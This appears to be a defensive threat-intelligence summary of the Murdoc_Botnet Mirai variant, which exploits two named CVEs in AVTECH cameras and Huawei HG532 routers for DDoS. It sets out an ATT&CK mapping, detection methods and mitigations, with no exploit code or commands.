Full Report
Cybersecurity researchers have warned of a new large-scale campaign that exploits security flaws in AVTECH IP cameras and Huawei HG532 routers to rope the devices into a Mirai botnet variant dubbed Murdoc_Botnet. The ongoing activity "demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks," Qualys security researcher Shilpesh
Analysis Summary
# Tool/Technique: Murdoc\_Botnet (Mirai Variant)
## Overview
Murdoc\_Botnet is a large-scale botnet campaign identified as a variant of the Mirai malware. Its primary purpose is to compromise Internet of Things (IoT) devices, specifically targeting AVTECH IP cameras and Huawei HG532 routers, to enlist them into a botnet primarily for carrying out Distributed Denial-of-Service (DDoS) attacks.
## Technical Details
- Type: Malware family (Botnet variant, derived from Mirai)
- Platform: IoT Devices (AVTECH IP Cameras, Huawei HG532 routers)
- Capabilities: Exploitation of known vulnerabilities, downloading and executing payloads, and participation in DDoS activities.
- First Seen: Active since at least July 2024.
## MITRE ATT&CK Mapping
The primary activity described falls under Initial Access and Execution, ultimately leading to Impact via DDoS.
- T1190 - Exploit Public-Facing Application (Initial Access)
- CVE-2017-17215 and CVE-2024-7029 are explicitly leveraged.
- T1059 - Command and Scripting Interpreter (Execution)
- Involves downloading and executing a shell script to fetch the next stage payload.
- T1498 - Network Denial of Service (Impact)
- The end goal of weaponizing the botnet.
## Functionality
### Core Capabilities
- **Exploitation:** Leverages known vulnerabilities in target devices (CVE-2017-17215 and CVE-2024-7029) to achieve initial system compromise.
- **Payload Delivery:** Upon initial access, downloads and executes a shell script.
- **Architecture-Specific Execution:** The shell script fetches the Murdoc\_Botnet malware and executes it according to the CPU architecture of the compromised device.
### Advanced Features
- **Botnet Expansion:** Demonstrates "enhanced capabilities" for establishing expansive botnet networks by consistently exploiting flaws in widely used IoT devices.
- **DDoS Weaponization:** The ultimate purpose of the compromised fleet of devices is to execute DDoS attacks.
## Indicators of Compromise
*Note: No specific file hashes, registry keys, or detailed C2/network indicators were provided in the text, other than the presence of the string "murdoc\_botnet" in compromised systems.*
- File Hashes: [N/A provided]
- File Names: Shell script used for payload fetching; Murdoc\_Botnet malware binary.
- Registry Keys: [N/A provided]
- Network Indicators: [No specific, defanged C2 addresses provided]
- Behavioral Indicators: Successful exploitation of CVE-2017-17215 or CVE-2024-7029 on AVTECH IP cameras or Huawei HG532 routers; detection of the shell script download/execution chain.
## Associated Threat Actors
- The specific threat actor group is not named, but the activity is attributed to the creators/operators of the Murdoc\_Botnet campaign.
## Detection Methods
- Signature-based detection: Detecting the known file names or hash values associated with the Murdoc malware payload (if known).
- Behavioral detection: Monitoring for unauthorized download and execution of shell scripts on IoT devices, especially those attempting to run architecture-specific binaries. Network monitoring for high-volume outbound traffic indicative of DDoS activity originating from these devices.
- YARA rules: [N/A provided]
## Mitigation Strategies
- **Patching/Updating:** Immediately patch or update AVTECH IP cameras and Huawei HG532 routers to eliminate the vulnerabilities (CVE-2017-17215 and CVE-2024-7029).
- **Network Segmentation:** Isolate IoT devices from critical internal networks.
- **Credential Management:** Ensure default or weak credentials are not in use, as Mirai variants often leverage brute-forcing (even if not explicitly mentioned as the initial vector here).
- **Firewall Rules:** Restrict inbound and outbound access to/from IoT devices to only necessary services.
## Related Tools/Techniques
- Mirai Botnet (Parent malware family)
- gayfemboy (Another recently noted Mirai variant)
- IoT Botnets (General category of malware leveraging weak IoT security)